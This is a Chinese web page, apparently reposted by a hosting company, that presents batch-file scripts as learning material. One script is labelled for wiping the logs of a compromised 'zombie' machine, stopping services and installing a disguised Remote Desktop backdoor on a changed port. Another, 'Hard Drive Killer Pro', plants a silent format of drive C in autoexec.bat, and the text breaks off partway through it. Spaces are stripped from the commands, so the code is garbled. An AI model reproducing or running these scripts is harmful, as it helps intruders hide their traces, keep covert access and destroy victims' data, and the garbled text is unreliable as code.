快速业务通道

学习使用批处理文件的意义第1/2页

作者 佚名 来源 批处理 浏览 发布时间 2013-07-09
@REM[禁止显示前一个登录用户名称]
  @regedit/spatch.dll
------------------------cutherethensaveas.bator.cmdfile---------------------------
  下面命令是清除肉鸡所有日志,禁止一些危险的服务,并修改肉鸡的terminnalservice留跳后路。
  @regedit/spatch.dll
  @netstopw3svc
  @netstopeventlog
  @delc:\winnt\system32\logfiles\w3svc1\*.*/f/q
  @delc:\winnt\system32\logfiles\w3svc2\*.*/f/q
  @delc:\winnt\system32\config\*.event/f/q
  @delc:\winnt\system32dtclog\*.*/f/q
  @delc:\winnt\*.txt/f/q
  @delc:\winnt\*.log/f/q
  @netstartw3svc
  @netstarteventlog
  @rem[删除日志]
  @netstoplanmanserver/y
  @netstopSchedule/y
  @netstopRemoteRegistry/y
  @delpatch.dll
  @echoTheserverhasbeenpatched,Havefun.
  @delpatch.bat
  @REM[禁止一些危险的服务。]
  @echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\WinStations\RDP-Tcp]>>patch.dll
  @echo"PortNumber"=dword:00002010>>patch.dll
  @echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\Wds\rdpwd\Tds\tcp>>patch.dll
  @echo"PortNumber"=dword:00002012>>patch.dll
  @echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]>>patch.dll
  @echo"Start"=dword:00000002>>patch.dll
  @echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService]>>patch.dll
  @echo"Start"=dword:00000002>>patch.dll
  @echo"ErrorControl"=dword:00000001>>patch.dll
  @echo"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\>>patch.dll
  @echo74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\>>patch.dll
  @echo00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00>>patch.dll
  @echo"ObjectName"="LocalSystem">>patch.dll
  @echo"Type"=dword:00000010>>patch.dll
  @echo"Description"="Keeprecordoftheprogramandwindowsmessage。">>patch.dll
  @echo"DisplayName"="MicrosoftEventLog">>patch.dll
  @echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\termservice]>>patch.dll
  @echo"Start"=dword:00000004>>patch.dll
  @copyc:\winnt\system32\termsrv.exec:\winnt\system32\eventlog.exe
  @REM[修改3389连接,端口为8210(十六进制为00002012),名称为MicrosoftEventLog,留条后路]
3.HardDriveKillerProVersion4.0(玩批处理到这个水平真的不容易了。)
  ------------------------cutherethensaveas.bator.cmdfile---------------------------
  @echooff
  remThisprogramisdedecatedtoaveryspecialpersonthatdoesnotwanttobenamed.
  :start
  cls
  echoPLEASEWAITWHILEPROGRAMLOADS...
  callattrib-r-hc:\autoexec.bat>nul
  echo@echooff>c:\autoexec.bat
  echocallformatc:/q/u/autoSample>nul>>c:\autoexec.bat
  callattrib+r+hc:\autoexec.bat>nul
  remDrivecheckingandassigningthevaliddrivestothedrivevariable.
  setdrive=
  setalldrive=cdefghijklmnopqrstuvwxyz
  remcodeinsertionforDriveCheckingtakesplacehere.
  remdrivechk.batisthefilenameund

凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢!

分享到: 更多

Copyright ©1999-2011 厦门凌众科技有限公司 厦门优通互联科技开发有限公司 All rights reserved

地址(ADD):厦门软件园二期望海路63号701E(东南融通旁) 邮编(ZIP):361008

电话:0592-5908028 传真:0592-5908039 咨询信箱:web@lingzhong.cn 咨询OICQ:173723134

《中华人民共和国增值电信业务经营许可证》闽B2-20100024  ICP备案:闽ICP备05037997号